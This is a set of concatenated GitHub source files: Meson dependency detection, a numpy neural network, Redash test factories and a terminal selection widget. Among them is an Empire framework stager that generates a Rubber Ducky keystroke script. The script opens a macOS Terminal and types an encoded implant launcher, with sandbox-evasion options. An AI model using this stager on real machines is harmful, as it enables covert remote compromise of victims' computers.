Drop -O2 and everything that is not needed.
"""
result = []
include_next = False
for f in args:
if f.startswith(('-L', '-l', '-Xlinker')) or f == '-pthread' \
or (f.startswith('-W') and f != '-Wall' and not f.startswith('-Werror')):
result.append(f)
if f in ('-L', '-Xlinker'):
include_next = True
elif include_next:
include_next = False
result.append(f)
return result
def _try_openmpi_wrapper(self, prog):
prog = ExternalProgram(prog, silent=True)
if prog.found():
cmd = prog.get_command() + ['--showme:compile']
p, o, e = mesonlib.Popen_safe(cmd)
p.wait()
if p.returncode != 0:
mlog.debug('Command', mlog.bold(cmd), 'failed to run:')
mlog.debug(mlog.bold('Standard output\n'), o)
mlog.debug(mlog.bold('Standard error\n'), e)
return
cargs = shlex.split(o)
cmd = prog.get_command() + ['--showme:link']
p, o, e = mesonlib.Popen_safe(cmd)
p.wait()
if p.returncode != 0:
mlog.debug('Command', mlog.bold(cmd), 'failed to run:')
mlog.debug(mlog.bold('Standard output\n'), o)
mlog.debug(mlog.bold('Standard error\n'), e)
return
libs = shlex.split(o)
cmd = prog.get_command() + ['--showme:version']
p, o, e = mesonlib.Popen_safe(cmd)
p.wait()
if p.returncode != 0:
mlog.debug('Command', mlog.bold(cmd), 'failed to run:')
mlog.debug(mlog.bold('Standard output\n'), o)
mlog.debug(mlog.bold('Standard error\n'), e)
return
version = re.search('\d+.\d+.\d+', o)
if version:
version = version.group(0)
else:
version = None
return version, cargs, libs
def _try_other_wrapper(self, prog):
prog = ExternalProgram(prog, silent=True)
if prog.found():
cmd = prog.get_command() + ['-show']
p, o, e = mesonlib.Popen_safe(cmd)
p.wait()
if p.returncode != 0:
mlog.debug('Command', mlog.bold(cmd), 'failed to run:')
mlog.debug(mlog.bold('Standard output\n'), o)
mlog.debug(mlog.bold('Standard error\n'), e)
return
args = shlex.split(o)
version = None
return version, args, args
def _try_msmpi(self):
if self.language == 'cpp':
# MS-MPI does not support the C++ version of MPI, only the standard C API.
return
if 'MSMPI_INC' not in os.environ:
return
incdir = os.environ['MSMPI_INC']
arch = detect_cpu_family(self.env.coredata.compilers)
if arch == 'x86':
if 'MSMPI_LIB32' not in os.environ:
return
libdir = os.environ['MSMPI_LIB32']
post = 'x86'
elif arch == 'x86_64':
if 'MSMPI_LIB64' not in os.environ:
return
libdir = os.environ['MSMPI_LIB64']
post = 'x64'
else:
return
if self.language == 'fortran':
return (None,
['-I' + incdir, '-I' + os.path.join(incdir, post)],
[os.path.join(libdir, 'msmpi.lib'), os.path.join(libdir, 'msmpifec.lib')])
else:
return (None,
['-I' + incdir, '-I' + os.path.join(incdir, post)],
[os.path.join(libdir, 'msmpi.lib')])
class OpenMPDependency(ExternalDependency):
# Map date of specification release (which is the macro value) to a version.
VERSIONS = {
'201511': '4.5',
'201307': '4.0',
'201107': '3.1',
'200805': '3.0',
'200505': '2.5',
'200203': '2.0',
'199810': '1.0',
}
def __init__(self, environment, kwargs):
language = kwargs.get('language')
super().__init__('openmp', environment, language, kwargs)
self.is_found = False
try:
openmp_date = self.clib_compiler.get_define('_OPENMP', '', self.env, [], [self])
except mesonlib.EnvironmentException as e:
mlog.debug('OpenMP support not available in the compiler')
mlog.debug(e)
openmp_date = False
if openmp_date:
self.version = self.VERSIONS[openmp_date]
if self.clib_compiler.has_header('omp.h', '', self.env, dependencies=[self]):
self.is_found = True
else:
mlog.log(mlog.yellow('WARNING:'), 'OpenMP found but omp.h missing.')
def need_openmp(self):
return True
class ThreadDependency(ExternalDependency):
def __init__(self, environment, kwargs):
super().__init__('threads', environment, None, kwargs)
self.name = 'threads'
self.is_found = True
def need_threads(self):
return True
class Python3Dependency(ExternalDependency):
def __init__(self, environment, kwargs):
super().__init__('python3', environment, None, kwargs)
self.name = 'python3'
self.static = kwargs.get('static', False)
# We can only be sure that it is Python 3 at this point
self.version = '3'
self.pkgdep = None
if DependencyMethods.PKGCONFIG in self.methods:
try:
self.pkgdep = PkgConfigDependency('python3', environment, kwargs)
if self.pkgdep.found():
self.compile_args = self.pkgdep.get_compile_args()
self.link_args = self.pkgdep.get_link_args()
self.version = self.pkgdep.get_version()
self.is_found = True
self.pcdep = self.pkgdep
return
else:
self.pkgdep = None
except Exception:
pass
if not self.is_found:
if mesonlib.is_windows() and DependencyMethods.SYSCONFIG in self.methods:
self._find_libpy3_windows(environment)
elif mesonlib.is_osx() and DependencyMethods.EXTRAFRAMEWORK in self.methods:
# In OSX the Python 3 framework does not have a version
# number in its name.
# There is a python in /System/Library/Frameworks, but that's
# python 2, Python 3 will always bin in /Library
fw = ExtraFrameworkDependency(
'python', False, '/Library/Frameworks', self.env, self.language, kwargs)
if fw.found():
self.compile_args = fw.get_compile_args()
self.link_args = fw.get_link_args()
self.is_found = True
@staticmethod
def get_windows_python_arch():
pyplat = sysconfig.get_platform()
if pyplat == 'mingw':
pycc = sysconfig.get_config_var('CC')
if pycc.startswith('x86_64'):
return '64'
elif pycc.startswith(('i686', 'i386')):
return '32'
else:
mlog.log('MinGW Python built with unknown CC {!r}, please file'
'a bug'.format(pycc))
return None
elif pyplat == 'win32':
return '32'
elif pyplat in ('win64', 'win-amd64'):
return '64'
mlog.log('Unknown Windows Python platform {!r}'.format(pyplat))
return None
def get_windows_link_args(self):
pyplat = sysconfig.get_platform()
if pyplat.startswith('win'):
vernum = sysconfig.get_config_var('py_version_nodot')
if self.static:
libname = 'libpython{}.a'.format(vernum)
else:
libname = 'python{}.lib'.format(vernum)
lib = Path(sysconfig.get_config_var('base')) / 'libs' / libname
elif pyplat == 'mingw':
if self.static:
libname = sysconfig.get_config_var('LIBRARY')
else:
libname = sysconfig.get_config_var('LDLIBRARY')
lib = Path(sysconfig.get_config_var('LIBDIR')) / libname
if not lib.exists():
mlog.log('Could not find Python3 library {!r}'.format(str(lib)))
return None
return [str(lib)]
def _find_libpy3_windows(self, env):
'''
Find python3 libraries on Windows and also verify that the arch matches
what we are building for.
'''
pyarch = self.get_windows_python_arch()
if pyarch is None:
self.is_found = False
return
arch = detect_cpu_family(env.coredata.compilers)
if arch == 'x86':
arch = '32'
elif arch == 'x86_64':
arch = '64'
else:
# We can't cross-compile Python 3 dependencies on Windows yet
mlog.log('Unknown architecture {!r} for'.format(arch),
mlog.bold(self.name))
self.is_found = False
return
# Pyarch ends in '32' or '64'
if arch != pyarch:
mlog.log('Need', mlog.bold(self.name), 'for {}-bit, but '
'found {}-bit'.format(arch, pyarch))
self.is_found = False
return
# This can fail if the library is not found
largs = self.get_windows_link_args()
if largs is None:
self.is_found = False
return
self.link_args = largs
# Compile args
inc = sysconfig.get_path('include')
platinc = sysconfig.get_path('platinclude')
self.compile_args = ['-I' + inc]
if inc != platinc:
self.compile_args.append('-I' + platinc)
self.version = sysconfig.get_config_var('py_version')
self.is_found = True
@staticmethod
def get_methods():
if mesonlib.is_windows():
return [DependencyMethods.PKGCONFIG, DependencyMethods.SYSCONFIG]
elif mesonlib.is_osx():
return [DependencyMethods.PKGCONFIG, DependencyMethods.EXTRAFRAMEWORK]
else:
return [DependencyMethods.PKGCONFIG]
def get_pkgconfig_variable(self, variable_name, kwargs):
if self.pkgdep:
return self.pkgdep.get_pkgconfig_variable(variable_name, kwargs)
else:
return super().get_pkgconfig_variable(variable_name, kwargs)
class PcapDependency(ExternalDependency):
def __init__(self, environment, kwargs):
super().__init__('pcap', environment, None, kwargs)
@classmethod
def _factory(cls, environment, kwargs):
methods = cls._process_method_kw(kwargs)
candidates = []
if DependencyMethods.PKGCONFIG in methods:
candidates.append(functools.partial(PkgConfigDependency, 'pcap', environment, kwargs))
if DependencyMethods.CONFIG_TOOL in methods:
candidates.append(functools.partial(ConfigToolDependency.factory,
'pcap', environment, None,
kwargs, ['pcap-config'],
'pcap-config',
PcapDependency.tool_finish_init))
return candidates
@staticmethod
def tool_finish_init(ctdep):
ctdep.compile_args = ctdep.get_config_value(['--cflags'], 'compile_args')
ctdep.link_args = ctdep.get_config_value(['--libs'], 'link_args')
ctdep.version = PcapDependency.get_pcap_lib_version(ctdep)
@staticmethod
def get_methods():
return [DependencyMethods.PKGCONFIG, DependencyMethods.CONFIG_TOOL]
@staticmethod
def get_pcap_lib_version(ctdep):
v = ctdep.clib_compiler.get_return_value('pcap_lib_version', 'string',
'#include <pcap.h>', ctdep.env, [], [ctdep])
v = re.sub(r'libpcap version ', '', v)
v = re.sub(r' -- Apple version.*$', '', v)
return v
class CupsDependency(ExternalDependency):
def __init__(self, environment, kwargs):
super().__init__('cups', environment, None, kwargs)
@classmethod
def _factory(cls, environment, kwargs):
methods = cls._process_method_kw(kwargs)
candidates = []
if DependencyMethods.PKGCONFIG in methods:
candidates.append(functools.partial(PkgConfigDependency, 'cups', environment, kwargs))
if DependencyMethods.CONFIG_TOOL in methods:
candidates.append(functools.partial(ConfigToolDependency.factory,
'cups', environment, None,
kwargs, ['cups-config'],
'cups-config', CupsDependency.tool_finish_init))
if DependencyMethods.EXTRAFRAMEWORK in methods:
if mesonlib.is_osx():
candidates.append(functools.partial(
ExtraFrameworkDependency, 'cups', False, None, environment,
kwargs.get('language', None), kwargs))
return candidates
@staticmethod
def tool_finish_init(ctdep):
ctdep.compile_args = ctdep.get_config_value(['--cflags'], 'compile_args')
ctdep.link_args = ctdep.get_config_value(['--ldflags', '--libs'], 'link_args')
@staticmethod
def get_methods():
if mesonlib.is_osx():
return [DependencyMethods.PKGCONFIG, DependencyMethods.CONFIG_TOOL, DependencyMethods.EXTRAFRAMEWORK]
else:
return [DependencyMethods.PKGCONFIG, DependencyMethods.CONFIG_TOOL]
class LibWmfDependency(ExternalDependency):
def __init__(self, environment, kwargs):
super().__init__('libwmf', environment, None, kwargs)
@classmethod
def _factory(cls, environment, kwargs):
methods = cls._process_method_kw(kwargs)
candidates = []
if DependencyMethods.PKGCONFIG in methods:
candidates.append(functools.partial(PkgConfigDependency, 'libwmf', environment, kwargs))
if DependencyMethods.CONFIG_TOOL in methods:
candidates.append(functools.partial(ConfigToolDependency.factory,
'libwmf', environment, None, kwargs, ['libwmf-config'], 'libwmf-config', LibWmfDependency.tool_finish_init))
return candidates
@staticmethod
def tool_finish_init(ctdep):
ctdep.compile_args = ctdep.get_config_value(['--cflags'], 'compile_args')
ctdep.link_args = ctdep.get_config_value(['--libs'], 'link_args')
@staticmethod
def get_methods():
return [DependencyMethods.PKGCONFIG, DependencyMethods.CONFIG_TOOL]
|
{
"content_hash": "d3132997574d68169f532a660985a0c7",
"timestamp": "",
"source": "github",
"line_count": 501,
"max_line_length": 156,
"avg_line_length": 38.22355289421158,
"alnum_prop": 0.5373368146214099,
"repo_name": "jeandet/meson",
"id": "014be84ab851229cc275ed43e08099c78c7e6b77",
"size": "19826",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mesonbuild/dependencies/misc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "4190"
},
{
"name": "Batchfile",
"bytes": "868"
},
{
"name": "C",
"bytes": "143772"
},
{
"name": "C#",
"bytes": "949"
},
{
"name": "C++",
"bytes": "27136"
},
{
"name": "CMake",
"bytes": "1780"
},
{
"name": "D",
"bytes": "4573"
},
{
"name": "Dockerfile",
"bytes": "754"
},
{
"name": "Emacs Lisp",
"bytes": "919"
},
{
"name": "Fortran",
"bytes": "4590"
},
{
"name": "Genie",
"bytes": "341"
},
{
"name": "Inno Setup",
"bytes": "372"
},
{
"name": "Java",
"bytes": "2125"
},
{
"name": "JavaScript",
"bytes": "136"
},
{
"name": "LLVM",
"bytes": "75"
},
{
"name": "Lex",
"bytes": "135"
},
{
"name": "Meson",
"bytes": "321893"
},
{
"name": "Objective-C",
"bytes": "1092"
},
{
"name": "Objective-C++",
"bytes": "332"
},
{
"name": "Python",
"bytes": "1873182"
},
{
"name": "Roff",
"bytes": "301"
},
{
"name": "Rust",
"bytes": "1079"
},
{
"name": "Shell",
"bytes": "2083"
},
{
"name": "Swift",
"bytes": "1152"
},
{
"name": "Vala",
"bytes": "10025"
},
{
"name": "Verilog",
"bytes": "709"
},
{
"name": "Vim script",
"bytes": "9480"
},
{
"name": "Yacc",
"bytes": "50"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
from builtins import object
from lib.common import helpers
class Stager(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'DuckyLauncher',
'Author': ['@xorrior'],
'Description': ('Generates a ducky script that runs a one-liner stage0 launcher for Empire.'),
'Comments': [
''
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
},
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'python'
},
'SafeChecks' : {
'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
'Required' : True,
'Value' : 'True'
},
'OutFile' : {
'Description' : 'File to output duckyscript to, otherwise displayed on the screen.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
safeChecks = self.options['SafeChecks']['Value']
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, safeChecks=safeChecks)
if launcher == "":
print(helpers.color("[!] Error in launcher command generation."))
return ""
else:
duckyCode = "DELAY 1000\n"
duckyCode += "COMMAND SPACE\n"
duckyCode += "DELAY 1000\n"
duckyCode += "STRING TERMINAL\n"
duckyCode += "ENTER \n"
duckyCode += "DELAY 1000\n"
duckyCode += "STRING "+launcher
duckyCode += "\nENTER\n"
duckyCode += "DELAY 1000\n"
return duckyCode
|
{
"content_hash": "05353b83f263c5e579573ac38fc17c06",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 148,
"avg_line_length": 35.651685393258425,
"alnum_prop": 0.49889694295619286,
"repo_name": "byt3bl33d3r/Empire",
"id": "4ca847833ae9f8c10a1c53b1507be67ab20411b0",
"size": "3173",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/stagers/osx/ducky.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1966"
},
{
"name": "Java",
"bytes": "496"
},
{
"name": "Objective-C",
"bytes": "2664"
},
{
"name": "PHP",
"bytes": "2198"
},
{
"name": "PowerShell",
"bytes": "16998705"
},
{
"name": "Python",
"bytes": "2789955"
},
{
"name": "Shell",
"bytes": "10123"
}
],
"symlink_target": ""
}
|
import matplotlib.pyplot as plt
import numpy as np
from theano import tensor as T
import data
def data_loader():
data_processor = data.Processor()
dataset = data_processor.get_dataset()
data_length = len(dataset)
training_set = dataset[:(data_length*6/10)]
validation_set = dataset[(data_length*6/10): (data_length*8/10)]
test_set = dataset[(data_length*8/10):]
print "training_length:", len(training_set),
print "validation_length:", len(validation_set),
print "test_length:", len(test_set)
return [
training_set,
validation_set,
test_set
]
def sigmoid(z):
return 1.0/(1.0+np.exp(-z))
def sigmoid_prime(z):
return sigmoid(z)*(1-sigmoid(z))
class CrossEntropyCost(object):
@staticmethod
def func(a, y):
return np.sum(np.nan_to_num(-y * np.log(a) - (1-y) * np.log(1-a)))
@staticmethod
def deriv(z, a, y):
return (a - y)
class Network(object):
def __init__(self, layer_sizes):
self.layer_count = len(layer_sizes)
self.layer_sizes = layer_sizes
self.cost=CrossEntropyCost
# large weight initialization
self.parameters = [np.random.randn(y, x) for x, y in zip(self.layer_sizes[:-1], self.layer_sizes[1:])]
self.biases = [np.random.randn(y, 1) for y in self.layer_sizes[1:]]
def feed_forward(self, a):
for b, w in zip(self.biases, self.parameters):
a = sigmoid(np.dot(w, a) + b)
return a
def SGD(self,
training_data,
epochs,
training_batch_size,
eta,
lmbda = 0.0,
test_data = [],
debug = ['tr_cost', 'tr_acc', 'test_cost', 'test_acc']):
n_test_data = len(test_data)
n = len(training_data)
test_cost, test_accuracy = [], []
training_cost, training_accurary = [], []
for j in xrange(epochs):
batches = [training_data[k: k + training_batch_size] for k in xrange(0, n, training_batch_size)]
for batch in batches:
self.grad_desc(batch, eta, lmbda, n)
print "Epoch : %s" % j
if j / 600 == 1:
eta /= 3
if 'tr_cost' in debug: print "training_cost : {}".format(self.total_cost(training_data, lmbda))
if 'tr_acc' in debug: print "training_acc : {}".format(self.accuracy(training_data))
if 'test_cost' in debug: print "testing_cost : {}".format(self.total_cost(test_data, lmbda))
if 'test_acc' in debug: print "testing_acc : {}".format(self.accuracy(test_data))
def grad_desc(self, batch, eta, lmbda, n):
acc_b = [np.zeros(b.shape) for b in self.biases]
acc_w = [np.zeros(w.shape) for w in self.parameters]
for x, y in batch:
delta_b, delta_w = self.back_propagate(x, y)
acc_b = [b + db for b, db in zip(acc_b, delta_b)]
acc_w = [w + dw for w, dw in zip(acc_w, delta_w)]
self.parameters = [(1 - eta * (lmbda/n)) * w - (eta/len(batch)) * aw
for w, aw in zip(self.parameters, acc_w)]
self.biases = [b - (eta/len(batch)) * ab
for b, ab in zip(self.biases, acc_b)]
def back_propagate(self, x, y):
acc_b = [np.zeros(b.shape) for b in self.biases]
acc_w = [np.zeros(w.shape) for w in self.parameters]
activation = x
activations = [x]
zs = []
for b, w in zip(self.biases, self.parameters):
z = np.dot(w, activation) + b
zs.append(z)
activation = sigmoid(z)
activations.append(activation)
delta = self.cost.deriv(zs[-1], activations[-1], y)
acc_b[-1] = delta
acc_w[-1] = np.dot(delta, activations[-2].T)
for l in xrange(2, self.layer_count):
z = zs[-l]
sp = sigmoid_prime(z)
delta = np.dot(self.parameters[-l+1].T, delta) * sp
acc_b[-l] = delta
acc_w[-l] = np.dot(delta, activations[-l-1].T)
return (acc_b, acc_w)
def total_cost(self, data, lmbda):
cost = 0.0
for x, y in data:
a = self.feed_forward(x)
cost += self.cost.func(a, y)/len(data)
cost += 0.5 * (lmbda/len(data)) * sum(
np.linalg.norm(w)**2 for w in self.parameters)
return cost
def accuracy(self, data):
results = [(np.argmax(self.feed_forward(x)), np.argmax(y))
for (x, y) in data]
return sum(int(x==y) for (x, y) in results)
|
{
"content_hash": "4aa719dfaf1df0d50b71a62efe1ce9d2",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 110,
"avg_line_length": 37.203252032520325,
"alnum_prop": 0.5428321678321678,
"repo_name": "shams-sam/logic-lab",
"id": "96a2fa49e386970f6314482f189709df140156a9",
"size": "4576",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ANNForFingerprint/NeuralNetwork/network.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Java",
"bytes": "13431"
},
{
"name": "Jupyter Notebook",
"bytes": "2608132"
},
{
"name": "MATLAB",
"bytes": "7585"
},
{
"name": "Python",
"bytes": "45971"
},
{
"name": "Scala",
"bytes": "2747"
},
{
"name": "Shell",
"bytes": "11214"
},
{
"name": "TSQL",
"bytes": "2794"
}
],
"symlink_target": ""
}
|
import redash.models
from redash.utils import gen_query_hash, utcnow
from redash.utils.configuration import ConfigurationContainer
class ModelFactory(object):
def __init__(self, model, **kwargs):
self.model = model
self.kwargs = kwargs
def _get_kwargs(self, override_kwargs):
kwargs = self.kwargs.copy()
kwargs.update(override_kwargs)
for key, arg in kwargs.items():
if callable(arg):
kwargs[key] = arg()
return kwargs
def instance(self, **override_kwargs):
kwargs = self._get_kwargs(override_kwargs)
return self.model(**kwargs)
def create(self, **override_kwargs):
kwargs = self._get_kwargs(override_kwargs)
return self.model.create(**kwargs)
class Sequence(object):
def __init__(self, string):
self.sequence = 0
self.string = string
def __call__(self):
self.sequence += 1
return self.string.format(self.sequence)
user_factory = ModelFactory(redash.models.User,
name='John Doe', email=Sequence('test{}@example.com'),
groups=[2],
org=1)
org_factory = ModelFactory(redash.models.Organization,
name=Sequence("Org {}"),
slug=Sequence("org{}.example.com"),
settings={})
data_source_factory = ModelFactory(redash.models.DataSource,
name=Sequence('Test {}'),
type='pg',
options=ConfigurationContainer.from_json('{"dbname": "test"}'),
org=1)
dashboard_factory = ModelFactory(redash.models.Dashboard,
name='test', user=user_factory.create, layout='[]', org=1)
api_key_factory = ModelFactory(redash.models.ApiKey,
object=dashboard_factory.create)
query_factory = ModelFactory(redash.models.Query,
name='New Query',
description='',
query='SELECT 1',
user=user_factory.create,
is_archived=False,
schedule=None,
data_source=data_source_factory.create,
org=1)
alert_factory = ModelFactory(redash.models.Alert,
name=Sequence('Alert {}'),
query=query_factory.create,
user=user_factory.create,
options={})
query_result_factory = ModelFactory(redash.models.QueryResult,
data='{"columns":{}, "rows":[]}',
runtime=1,
retrieved_at=utcnow,
query="SELECT 1",
query_hash=gen_query_hash('SELECT 1'),
data_source=data_source_factory.create,
org=1)
visualization_factory = ModelFactory(redash.models.Visualization,
type='CHART',
query=query_factory.create,
name='Chart',
description='',
options='{}')
widget_factory = ModelFactory(redash.models.Widget,
type='chart',
width=1,
options='{}',
dashboard=dashboard_factory.create,
visualization=visualization_factory.create)
class Factory(object):
def __init__(self):
self.org, self.admin_group, self.default_group = redash.models.init_db()
self.org.domain = "org0.example.org"
self.org.save()
self.data_source = data_source_factory.create(org=self.org)
self.user = self.create_user()
redash.models.DataSourceGroup.create(group=self.default_group, data_source=self.data_source)
def create_org(self, **kwargs):
org = org_factory.create(**kwargs)
self.create_group(org=org, type=redash.models.Group.BUILTIN_GROUP, name="default")
self.create_group(org=org, type=redash.models.Group.BUILTIN_GROUP, name="admin", permissions=["admin"])
return org
def create_user(self, **kwargs):
args = {
'org': self.org,
'groups': [self.default_group.id]
}
if 'org' in kwargs:
args['groups'] = [kwargs['org'].default_group.id]
args.update(kwargs)
return user_factory.create(**args)
def create_admin(self, **kwargs):
args = {
'org': self.org,
'groups': [self.admin_group.id, self.default_group.id]
}
if 'org' in kwargs:
args['groups'] = [kwargs['org'].default_group.id, kwargs['org'].admin_group.id]
args.update(kwargs)
return user_factory.create(**args)
def create_group(self, **kwargs):
args = {
'name': 'Group',
'org': self.org
}
args.update(kwargs)
return redash.models.Group.create(**args)
def create_alert(self, **kwargs):
args = {
'user': self.user,
'query': self.create_query()
}
args.update(**kwargs)
return alert_factory.create(**args)
def create_data_source(self, **kwargs):
args = {
'org': self.org
}
args.update(kwargs)
if 'group' in kwargs and 'org' not in kwargs:
args['org'] = kwargs['group'].org
data_source = data_source_factory.create(**args)
if 'group' in kwargs:
view_only = kwargs.pop('view_only', False)
redash.models.DataSourceGroup.create(group=kwargs['group'],
data_source=data_source,
view_only=view_only)
return data_source
def create_dashboard(self, **kwargs):
args = {
'user': self.user,
'org': self.org
}
args.update(kwargs)
return dashboard_factory.create(**args)
def create_query(self, **kwargs):
args = {
'user': self.user,
'data_source': self.data_source,
'org': self.org
}
args.update(kwargs)
return query_factory.create(**args)
def create_query_result(self, **kwargs):
args = {
'data_source': self.data_source,
}
args.update(kwargs)
if 'data_source' in args and 'org' not in args:
args['org'] = args['data_source'].org_id
return query_result_factory.create(**args)
def create_visualization(self, **kwargs):
args = {
'query': self.create_query()
}
args.update(kwargs)
return visualization_factory.create(**args)
def create_widget(self, **kwargs):
args = {
'dashboard': self.create_dashboard(),
'visualization': self.create_visualization()
}
args.update(kwargs)
return widget_factory.create(**args)
def create_api_key(self, **kwargs):
args = {
'org': self.org
}
args.update(kwargs)
return api_key_factory.create(**args)
|
{
"content_hash": "358167a3f4057a8518d311a655c48521",
"timestamp": "",
"source": "github",
"line_count": 234,
"max_line_length": 111,
"avg_line_length": 32.50854700854701,
"alnum_prop": 0.4983567766530827,
"repo_name": "jmvasquez/redashtest",
"id": "7bf04bde94fbbf923076a58622ff40b28246b6cf",
"size": "7607",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/factories.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "10567"
},
{
"name": "HTML",
"bytes": "123402"
},
{
"name": "JavaScript",
"bytes": "257609"
},
{
"name": "Makefile",
"bytes": "1009"
},
{
"name": "Nginx",
"bytes": "577"
},
{
"name": "Python",
"bytes": "409970"
},
{
"name": "Ruby",
"bytes": "709"
},
{
"name": "Shell",
"bytes": "41757"
}
],
"symlink_target": ""
}
|
from platform import system
from ._base import Question
class ChoiceSelect(Question):
def __init__(self, name, query, choices=None, size=7,
default="", color=None, colormap=None):
super().__init__(name, query, default, color, colormap)
self._keys_in_use = [
"Enter", "ArrowUp", "ArrowDown"
]
self.widget = "choice"
self.size = size
self.choice_index = 0
self.cursor_index = 0
if choices is None:
self.choices = []
self.BOTTOM = 0
else:
self.choices = choices
self.BOTTOM = len(choices) - 1
self.overflow = len(choices) <= size
self.PADDING = 0 if self.overflow else size // 2
cursor_colormap = [(0, 0, 0), (7, 0, 0), (0, 0, 0), (0, 0, 0)]
self.config["cursor"] = (" › ", cursor_colormap)
self.config["active"] = (7, 0, 0)
self.config["inactive"] = (0, 0, 0)
def _set_config(self, n, c):
default = self.config[n]
return {
"icon": (*c, default) if type(c) is tuple else (c, default),
"cursor": (*c, default) if type(c) is tuple else (c, default),
"active": (c, default),
"inactive": (c, default),
"linespace": (c, default),
"result": (c, default),
"refresh": (c, default),
}.get(n, None)
def setup(self, icon=False, cursor=False, active=False, inactive=False,
linespace=False, result=False, refresh=False):
kwargs = {
"icon": icon,
"cursor": cursor,
"active": active,
"inactive": inactive,
"linespace": linespace,
"result": result,
"refresh": refresh,
}
super().setup(**kwargs)
def _segment_choices(self):
segment = []
length = len(self.choices)
if (length <= self.size):
segment = self.choices
else:
start = self.choice_index - self.cursor_index
finish = self.size + start
segment = self.choices[start:finish]
return segment
def _prepare_choices(self):
active = self.config["active"]
inactive = self.config["inactive"]
segment = self._segment_choices()
choices = [(c, [inactive for _ in c]) for c in segment]
cursor, cursor_cm = self.config["cursor"]
blanks = ''.join([" " for _ in cursor])
blanks_cm = [inactive for _ in cursor_cm]
render_list = []
for i, c in enumerate(choices):
render = None
choice, choice_cm = c
if i == self.cursor_index:
choice_cm = [active for _ in choice]
render = (cursor + choice, cursor_cm + choice_cm)
else:
render = (blanks + choice, blanks_cm + choice_cm)
render_list.append(render)
return render_list
def _draw_widget(self):
x, y = 0, self.linenum + 1
renderable = self._prepare_choices()
for choice in renderable:
c, cm = choice
for ch, colors in zip(c, cm):
fg, attr, bg = colors
self.cli.set_cell(x, y, ch, fg | attr, bg)
x += 1
y += 1
x = 0
return None
def _clear_widget(self):
w, h = self.cli.size()
h = self.size
for i in range(h):
y = i + self.linenum + 1
for x in range(w):
self.cli.set_cell(x, y, " ", 0, 0)
return None
def redraw_all(self):
self._clear_widget()
self._draw_widget()
self.cli.hide_cursor()
self.cli.flush()
def reset(self):
super().reset()
self.choice_index = 0
self.cursor_index = 0
def _main(self):
super()._main()
self.result = self.choices[self.choice_index]
return None
def _handle_events(self):
evt = self.pull_events()[0]
if evt["Type"] == self.cli.event("Key"):
k = evt["Key"]
if k == self.cli.key("Enter"):
self.end_signal = True
elif k == self.cli.key("ArrowUp"):
if self.cursor_index > self.PADDING:
self.cursor_index -= 1
self.choice_index -= 1
elif self.choice_index > self.PADDING:
self.choice_index -= 1
elif self.choice_index <= self.PADDING:
if self.choice_index > 0:
self.choice_index -= 1
self.cursor_index -= 1
else:
self.cursor_index = 0
elif k == self.cli.key("ArrowDown"):
if self.cursor_index < self.PADDING:
self.cursor_index += 1
self.choice_index += 1
elif self.choice_index < self.BOTTOM - self.PADDING:
if self.overflow:
self.cursor_index += 1
self.choice_index += 1
elif self.choice_index >= self.BOTTOM - self.PADDING:
if self.choice_index < self.BOTTOM:
self.choice_index += 1
self.cursor_index += 1
else:
self.choice_index = self.BOTTOM
else:
pass
elif evt["Type"] == self.cli.event("Error"):
# EventError
raise(Exception(evt["Err"]))
return None
class MultiSelect(ChoiceSelect):
def __init__(self, name, query, choices=None, size=7,
default="", color=None, colormap=None):
super().__init__(name, query, choices, size, default, color, colormap)
self._keys_in_use = [
"Enter", "ArrowLeft", "ArrowUp",
"ArrowRight", "ArrowDown", "Space",
]
self.widget = "multi-choice"
self.choices = [(c, False) for c in choices]
cursor_colormap = [(0, 0, 0), (7, 0, 0), (0, 0, 0)]
self.config["cursor"] = (" › ", cursor_colormap)
self.config["selected"] = "► " if system() == "Windows" else "◉ "
self.config["unselected"] = '○ '
def _set_config(self, n, c):
default = self.config[n]
return {
"icon": (*c, default) if type(c) is tuple else (c, default),
"cursor": (*c, default) if type(c) is tuple else (c, default),
"selected": (c, default),
"unselected": (c, default),
"active": (c, default),
"inactive": (c, default),
"linespace": (c, default),
"result": (c, default),
"refresh": (c, default),
}.get(n, None)
def setup(self, icon=False, cursor=False, selected=False, unselected=False,
active=False, inactive=False, linespace=False, result=False,
refresh=False):
kwargs = {
"icon": icon,
"cursor": cursor,
"selected": selected,
"unselected": unselected,
"active": active,
"inactive": inactive,
"linespace": linespace,
"result": result,
"refresh": refresh,
}
# have to call the base Question class
# since MultiSelect extends ChoiceSelect
# and ChoiceSelect has different kwargs
# than what the MultiSelect can accept
super(ChoiceSelect, self).setup(**kwargs)
def _prepare_choices(self):
active = self.config["active"]
inactive = self.config["inactive"]
cursor, cursor_cm = self.config["cursor"]
selected = self.config["selected"]
unselected = self.config["unselected"]
choices = self._segment_choices()
blanks = ''.join([" " for _ in cursor])
# blanks_cm = [inactive for _ in blanks] # TODO: confirm usage
render_list = []
for i, c in enumerate(choices):
render = None
choice, is_checked = c
if i == self.cursor_index:
if is_checked:
